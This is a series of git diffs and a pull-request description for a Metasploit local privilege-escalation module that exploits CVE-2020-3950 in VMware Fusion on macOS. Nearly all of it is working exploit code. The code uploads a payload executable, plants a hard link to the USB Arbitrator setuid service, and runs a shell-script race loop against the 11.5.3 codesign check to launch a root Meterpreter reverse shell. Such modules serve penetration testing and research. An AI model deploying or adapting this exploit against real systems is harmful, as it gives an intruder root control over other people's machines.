     /=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
-    version = Gem::Version.new(version)
-    if version.between?(Gem::Version.new('11.5.0'), Gem::Version.new('11.5.2'))
+    Gem::Version.new(version)
+  end
+
+  def pre_11_5_3
+    # Upload payload executable & chmod
+    payload_filename = "#{base_dir}#{usb_service}"
+    print_status "Uploading Payload: #{payload_filename}"
+    write_file "#{payload_filename}", generate_payload_exe
+    chmod "#{payload_filename}", 0755
+    register_file_for_cleanup "#{payload_filename}"
+
+    # create folder structure and hard link to the original binary
+    root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
+    link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
+    cmd_exec "mkdir -p #{link_folder}"
+    cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"
+    print_status "Created folder (#{link_folder}) and link"
+    # register_file_for_cleanup "#{link_folder}/#{open_usb_service}" # this is handled later in rm_rf
+
+    print_status 'Starting USB Service (5 sec pause)'
+    cmd_exec "cd #{link_folder}; '#{link_folder}/#{open_usb_service}' &"
+    Rex.sleep 5 # give time for the service to execute our payload
+    print_status 'Killing service'
+    cmd_exec "pkill '#{open_usb_service}'"
+    print_status "Deleting #{root_link_folder}"
+    rm_rf root_link_folder
+  end
+
+  def exactly_11_5_3
+    # Upload payload executable & chmod
+    payload_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
+    print_status "Uploading Payload to #{payload_name}"
+    write_file "#{payload_name}", generate_payload_exe
+    chmod "#{payload_name}", 0755
+    register_file_for_cleanup "#{base_dir}VMware USB Arbitrator Service"
+    #create race with codesign check
+    root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
+    link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
+    print_status 'Uploading race condition executable.'
+    race = []
+    race << '#!/bin/sh'
+    race << 'while [ "1" = "1" ]; do'
+    race << "    ln -f '/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}' '#{base_dir}#{usb_service}'"
+    race << "    ln -f '#{payload_name}' '#{base_dir}#{usb_service}'"
+    race << 'done'
+    race = race.join("\n")
+    racer_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
+    upload_and_chmodx racer_name, race
+    register_file_for_cleanup racer_name
+    # create the hard link
+    print_status "Creating folder (#{link_folder}) and link"
+    cmd_exec "mkdir -p #{link_folder}"
+    cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"
+
+    # create the launcher to start the racer and keep launching our service to attempt to win
+    launcher = []
+    launcher << '#!/bin/sh'
+    launcher << "#{racer_name} &"
+    launcher << "for i in {1..#{datastore['MAXATTEMPTS']}}"
+    launcher << 'do'
+    launcher << '    echo "attempt $i";'
+    launcher << "    '#{link_folder}#{open_usb_service}'"
+    launcher << 'done'
+    launcher = launcher.join("\n")
+    runner_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
+    upload_and_chmodx runner_name, launcher
+    register_file_for_cleanup runner_name
+
+    print_status "Launching Exploit #{runner_name}"
+    results = cmd_exec "#{runner_name} &"
+    vprint_status results
+
+    print_status 'Exploit Finished, killing scripts.'
+    cmd_exec "pkill #{racer_name}"
+    cmd_exec "pkill #{runner_name}" # in theory should be killed already but just in case
+    rm_rf base_dir
+  end
+
+  def check
+    unless exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}"
+      print_bad "'#{open_usb_service}' binary missing"
+      return CheckCode::Safe
+    end
+    version = get_version
+    if version.between?(Gem::Version.new('11.5.0'), Gem::Version.new('11.5.3'))
       vprint_good "Vmware Fusion #{version} is exploitable"
     else
       print_bad "VMware Fusion #{version} is NOT exploitable"
@@ -111,27 +200,14 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with Failure::BadConfig, "#{base_dir} is not writable"
     end
 
-    # Upload payload executable & chmod
-    print_status 'Uploading Payload'
-    write_file "#{base_dir}VMware USB Arbitrator Service", generate_payload_exe
-    chmod "#{base_dir}VMware USB Arbitrator Service", 0755
-    register_file_for_cleanup "#{base_dir}VMware USB Arbitrator Service"
+    version = get_version
+    if version == Gem::Version.new('11.5.3')
+      vprint_status 'Using 11.5.3 exploit'
+      exactly_11_5_3
+    elsif version.between?(Gem::Version.new('11.5.0'), Gem::Version.new('11.5.2'))
+      vprint_status 'Using pre-11.5.3 exploit'
+      pre_11_5_3
+    end
 
-    # create folder structure and hard link to the original binary
-    root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
-    link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
-    print_status "Creating folder (#{link_folder}) and link"
-
-    cmd_exec "mkdir -p #{link_folder}"
-    cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}' '#{link_folder}/#{usb_service}'"
-    # register_file_for_cleanup "#{link_folder}/#{usb_service}" # this is handled later in rm_rf
-
-    print_status 'Starting USB Arbitrator Service (5 sec pause)'
-    cmd_exec "cd #{link_folder}; '#{link_folder}/#{usb_service}' &"
-    Rex.sleep 5 # give time for the service to execute our payload
-    print_status 'Killing service'
-    cmd_exec "pkill '#{usb_service}'"
-    print_status "Deleting #{root_link_folder}"
-    rm_rf root_link_folder
   end
 end

--- a/modules/exploits/osx/local/vmware_fusion_lpe.rb
+++ b/modules/exploits/osx/local/vmware_fusion_lpe.rb
@@ -23,6 +23,7 @@ class MetasploitModule < Msf::Exploit::Local
             user home directory in a specific folder, and creating a hard link to the 'Open VMWare
             USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload
             with an effective UID of 0.
+            Successfully tested against 11.5.1, and 11.5.2
         ),
         'License'        => MSF_LICENSE,
         'Author'         =>
@@ -69,11 +70,21 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    if exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}"
-      print_good "'#{usb_service}' binary detected"
-      return CheckCode::Appears
+    unless exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}"
+      print_bad "'#{usb_service}' binary missing"
+      return CheckCode::Safe
     end
-    CheckCode::Safe
+    
+    version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
+    /=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
+    version = Gem::Version.new(version)
+    if version.between?(Gem::Version.new('11.5.0'), Gem::Version.new('11.5.2'))
+      vprint_good "Vmware Fusion #{version} is exploitable"
+    else    
+      print_bad "VMware Fusion #{version} is NOT exploitable"
+      return CheckCode::Safe
+    end
+    CheckCode::Appears
   end
 
   def exploit

--- a/modules/exploits/osx/local/vmware_fusion_lpe.rb
+++ b/modules/exploits/osx/local/vmware_fusion_lpe.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Local
         info,
         'Name'           => 'VMware Fusion USB Arbitrator Setuid Priv Esc',
         'Description'    => %q(
-            This exploits an improper use of setuid binaries within VMware Fusion 11 - 11.5.3.
+            This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.3.
             The Open VMware USB Arbitrator Service can be launched outide of its standard path
             which allows loading of an attacker controlled binary.  By creating a payload in the
             user home directory in a specific folder, and creating a hard link to the 'Open VMware
@@ -29,13 +29,14 @@ class MetasploitModule < Msf::Exploit::Local
         'License'        => MSF_LICENSE,
         'Author'         =>
           [
-            'h00die <mike@stcyrsecurity.com>', # msf module
+            'h00die', # msf module
             'Dhanesh Kizhakkinan', # discovery
             'Rich Mirch', # edb module
-            'Jeff Ball' # 11.5.3 exploit
+            'jeffball <jeffball@dc949.org>', # 11.5.3 exploit
+            'grimm'
           ],
-        'Platform'       => [ 'osx' ],
-        'Arch'           => [ ARCH_X86, ARCH_X64 ],
+        'Platform'       => [ 'osx', 'python' ],
+        'Arch'           => [ ARCH_X86, ARCH_X64, ARCH_PYTHON ],
         'SessionTypes'   => [ 'shell', 'meterpreter' ],
         'Targets'        => [[ 'Auto', {} ]],
         'Privileged'     => true,
@@ -44,19 +45,22 @@ class MetasploitModule < Msf::Exploit::Local
             [ 'EDB', '48235' ],
             [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0005.html' ],
             [ 'URL', 'https://twitter.com/jeffball55/status/1242530508053110785?s=20' ],
+            [ 'URL', 'https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt' ],
             [ 'CVE', '2020-3950' ]
           ],
         'DisclosureDate' => "Mar 17 2020",
         'DefaultOptions' =>
           {
-            'PrependSetuid'    => true,
-            'PAYLOAD'          => 'osx/x64/meterpreter_reverse_tcp',
+            #'PrependSetuid'  => true,
+            #'PrependFork'    => true,
+            'PAYLOAD'        => 'osx/x64/meterpreter_reverse_tcp',
+            'WfsDelay'       => 15
           }
       )
     )
 
     register_options [
-      OptInt.new('MAXATTEMPTS', [true, "Maximum attempts to win race for 11.5.3", 50]),
+      OptInt.new('MAXATTEMPTS', [true, "Maximum attempts to win race for 11.5.3", 75]),
     ]
 
     register_advanced_options [
@@ -73,17 +77,33 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def get_home_dir
-    cmd_exec 'echo ~'
+    home = cmd_exec 'echo ~'
+    if home.blank?
+      fail_with Failure::BadConfig, "Unable to determine home dir for shell."
+    end
+    home
+  end
+
+  def content_dir
+    "#{get_home_dir}/Contents"
   end
 
   def base_dir
-    "#{get_home_dir}/Contents/Library/services/"
+    "#{content_dir}/Library/services/"
+  end
+
+  def kill_process(executable)
+    pid_kill = cmd_exec "ps ax | grep #{executable} | grep -v grep | awk '{print \"kill -9 \" $1}'"
+    cmd_exec pid_kill
   end
 
   def get_version
     # Thanks to @ddouhine on github for this answer!
     version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
     /=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
+    if version_raw.blank?
+      fail_with Failure::BadConfig, "Unable to determine VMware Fusion version.  Set ForceExploit to override."
+    end
     Gem::Version.new(version)
   end
 
@@ -118,7 +138,7 @@ class MetasploitModule < Msf::Exploit::Local
     print_status "Uploading Payload to #{payload_name}"
     write_file "#{payload_name}", generate_payload_exe
     chmod "#{payload_name}", 0755
-    register_file_for_cleanup "#{base_dir}VMware USB Arbitrator Service"
+    #register_file_for_cleanup "#{base_dir}VMware USB Arbitrator Service"
     #create race with codesign check
     root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
     link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
@@ -133,6 +153,7 @@ class MetasploitModule < Msf::Exploit::Local
     racer_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
     upload_and_chmodx racer_name, race
     register_file_for_cleanup racer_name
+    register_dirs_for_cleanup root_link_folder
     # create the hard link
     print_status "Creating folder (#{link_folder}) and link"
     cmd_exec "mkdir -p #{link_folder}"
@@ -152,14 +173,18 @@ class MetasploitModule < Msf::Exploit::Local
     upload_and_chmodx runner_name, launcher
     register_file_for_cleanup runner_name
 
-    print_status "Launching Exploit #{runner_name}"
+    print_status "Launching Exploit #{runner_name} (sleeping 15sec)"
     results = cmd_exec "#{runner_name} &"
+    Rex.sleep 15 # give time for the service to execute our payload
     vprint_status results
 
     print_status 'Exploit Finished, killing scripts.'
-    cmd_exec "pkill #{racer_name}"
-    cmd_exec "pkill #{runner_name}" # in theory should be killed already but just in case
-    rm_rf base_dir
+    kill_process racer_name
+    kill_process runner_name # in theory should be killed already but just in case
+    kill_process "'#{link_folder}#{open_usb_service}'"
+    # kill_process 'ln' a rogue ln -f may mess us up, but killing them seemed to be unreliable and mark the exploit as failed.
+    # above caused: [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Unknown error
+    # rm_rf base_dir # this always fails. Leaving it here as a note that when things dont kill well, can't delete the folder
   end
 
   def check
@@ -168,7 +193,7 @@ class MetasploitModule < Msf::Exploit::Local
       return CheckCode::Safe
     end
     version = get_version
-    if version.between?(Gem::Version.new('11.5.0'), Gem::Version.new('11.5.3'))
+    if version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.3'))
       vprint_good "Vmware Fusion #{version} is exploitable"
     else
       print_bad "VMware Fusion #{version} is NOT exploitable"
@@ -194,10 +219,14 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     # Make sure we can write our payload to the remote system
-    rm_rf base_dir # live dangerously.
+    rm_rf content_dir # live dangerously.
+    if directory? content_dir
+      fail_with Filure::BadConfig, "#{content_dir} exists. Unable to delete automatically.  Please delete or exploit will fail."
+    end
     cmd_exec "mkdir -p #{base_dir}"
+    register_dirs_for_cleanup content_dir
     unless writable? base_dir
-      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+      fail_with Failure::BadConfig, "#{base_dir} is not writable."
     end
 
     version = get_version
@@ -208,6 +237,7 @@ class MetasploitModule < Msf::Exploit::Local
       vprint_status 'Using pre-11.5.3 exploit'
       pre_11_5_3
     end
+    rm_rf content_dir # live dangerously.
 
   end
 end

--- a/modules/exploits/osx/local/vmware_fusion_lpe.rb
+++ b/modules/exploits/osx/local/vmware_fusion_lpe.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Local
             USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload
             with an effective UID of 0.
             @jeffball55 discovered an incomplete patch in 11.5.3 with a TOCTOU race.
-            Successfully tested against 11.5.1, 11.5.2, and 11.5.3
+            Successfully tested against 10.1.6, 11.5.1, 11.5.2, and 11.5.3.
         ),
         'License'        => MSF_LICENSE,
         'Author'         =>
@@ -42,27 +42,27 @@ class MetasploitModule < Msf::Exploit::Local
         'Privileged'     => true,
         'References'     =>
           [
+            [ 'CVE', '2020-3950' ],
             [ 'EDB', '48235' ],
             [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0005.html' ],
             [ 'URL', 'https://twitter.com/jeffball55/status/1242530508053110785?s=20' ],
-            [ 'URL', 'https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt' ],
-            [ 'CVE', '2020-3950' ]
+            [ 'URL', 'https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt' ]
           ],
-        'DisclosureDate' => "Mar 17 2020",
+        'DisclosureDate' => 'Mar 17 2020',
         'DefaultOptions' =>
           {
-            'PAYLOAD'        => 'osx/x64/meterpreter_reverse_tcp',
-            'WfsDelay'       => 15
+            'PAYLOAD'    => 'osx/x64/meterpreter_reverse_tcp',
+            'WfsDelay'   => 15
           }
       )
     )
 
     register_options [
-      OptInt.new('MAXATTEMPTS', [true, "Maximum attempts to win race for 11.5.3", 75]),
+      OptInt.new('MAXATTEMPTS', [true, 'Maximum attempts to win race for 11.5.3', 75])
     ]
 
     register_advanced_options [
-      OptBool.new('ForceExploit',  [ false, 'Override check result', false ]),
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
     ]
   end
 
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Local
   def get_home_dir
     home = cmd_exec 'echo ~'
     if home.blank?
-      fail_with Failure::BadConfig, "Unable to determine home dir for shell."
+      fail_with Failure::BadConfig, 'Unable to determine home dir for shell.'
     end
     home
   end
@@ -91,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def kill_process(executable)
-    pid_kill = cmd_exec "ps ax | grep #{executable} | grep -v grep | awk '{print \"kill -9 \" $1}'"
+    pid_kill = cmd_exec %(ps ax | grep #{executable} | grep -v grep | awk '{print "kill -9 " $1}')
     cmd_exec pid_kill
   end
 
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Local
     version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
     /=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
     if version_raw.blank?
-      fail_with Failure::BadConfig, "Unable to determine VMware Fusion version.  Set ForceExploit to override."
+      fail_with Failure::BadConfig, 'Unable to determine VMware Fusion version.  Set ForceExploit to override.'
     end
     Gem::Version.new(version)
   end
@@ -109,9 +109,9 @@ class MetasploitModule < Msf::Exploit::Local
     # Upload payload executable & chmod
     payload_filename = "#{base_dir}#{usb_service}"
     print_status "Uploading Payload: #{payload_filename}"
-    write_file "#{payload_filename}", generate_payload_exe
-    chmod "#{payload_filename}", 0755
-    register_file_for_cleanup "#{payload_filename}"
+    write_file payload_filename, generate_payload_exe
+    chmod payload_filename, 0o755
+    register_file_for_cleanup payload_filename
 
     # create folder structure and hard link to the original binary
     root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
@@ -119,10 +119,10 @@ class MetasploitModule < Msf::Exploit::Local
     cmd_exec "mkdir -p #{link_folder}"
     cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"
     print_status "Created folder (#{link_folder}) and link"
-    # register_file_for_cleanup "#{link_folder}/#{open_usb_service}" # this is handled later in rm_rf
 
     print_status 'Starting USB Service (5 sec pause)'
-    cmd_exec "cd #{link_folder}; '#{link_folder}/#{open_usb_service}' &"
+    # XXX: The ; used by cmd_exec will interfere with &, so pad it with :
+    cmd_exec "cd #{link_folder}; '#{link_folder}/#{open_usb_service}' & :"
     Rex.sleep 5 # give time for the service to execute our payload
     print_status 'Killing service'
     cmd_exec "pkill '#{open_usb_service}'"
@@ -134,20 +134,19 @@ class MetasploitModule < Msf::Exploit::Local
     # Upload payload executable & chmod
     payload_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
     print_status "Uploading Payload to #{payload_name}"
-    write_file "#{payload_name}", generate_payload_exe
-    chmod "#{payload_name}", 0755
-    #register_file_for_cleanup "#{base_dir}VMware USB Arbitrator Service"
+    write_file payload_name, generate_payload_exe
+    chmod payload_name, 0o755
     #create race with codesign check
     root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
     link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
     print_status 'Uploading race condition executable.'
-    race = []
-    race << '#!/bin/sh'
-    race << 'while [ "1" = "1" ]; do'
-    race << "    ln -f '/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}' '#{base_dir}#{usb_service}'"
-    race << "    ln -f '#{payload_name}' '#{base_dir}#{usb_service}'"
-    race << 'done'
-    race = race.join("\n")
+    race = <<~EOF
+      #!/bin/sh
+      while [ "1" = "1" ]; do
+          ln -f '/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}' '#{base_dir}#{usb_service}'
+          ln -f '#{payload_name}' '#{base_dir}#{usb_service}'
+      done
+    EOF
     racer_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
     upload_and_chmodx racer_name, race
     register_file_for_cleanup racer_name
@@ -158,15 +157,15 @@ class MetasploitModule < Msf::Exploit::Local
     cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"
 
     # create the launcher to start the racer and keep launching our service to attempt to win
-    launcher = []
-    launcher << '#!/bin/sh'
-    launcher << "#{racer_name} &"
-    launcher << "for i in {1..#{datastore['MAXATTEMPTS']}}"
-    launcher << 'do'
-    launcher << '    echo "attempt $i";'
-    launcher << "    '#{link_folder}#{open_usb_service}'"
-    launcher << 'done'
-    launcher = launcher.join("\n")
+    launcher = <<~EOF
+      #!/bin/sh
+      #{racer_name} &
+      for i in {1..#{datastore['MAXATTEMPTS']}}
+      do
+          echo "attempt $i";
+          '#{link_folder}#{open_usb_service}'
+      done
+    EOF
     runner_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
     upload_and_chmodx runner_name, launcher
     register_file_for_cleanup runner_name
@@ -231,11 +230,10 @@ class MetasploitModule < Msf::Exploit::Local
     if version == Gem::Version.new('11.5.3')
       vprint_status 'Using 11.5.3 exploit'
       exactly_11_5_3
-    elsif version.between?(Gem::Version.new('11.5.0'), Gem::Version.new('11.5.2'))
+    elsif version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.2'))
       vprint_status 'Using pre-11.5.3 exploit'
       pre_11_5_3
     end
     rm_rf content_dir # live dangerously.
-
   end
 end


### PR DESCRIPTION
This adds an OSX priv esc against 2 versions of VMWare Fusion.  The binary is still available, but let me know if you need it in case it gets removed.  Gives an `euid=0`.

Of note, i'm not familiar with OSX, and I can't determine a good way to find the installed version of Fusion (like a `-V` on a specific binary that prints 11.5.1)

## Verification

see docs for verification steps.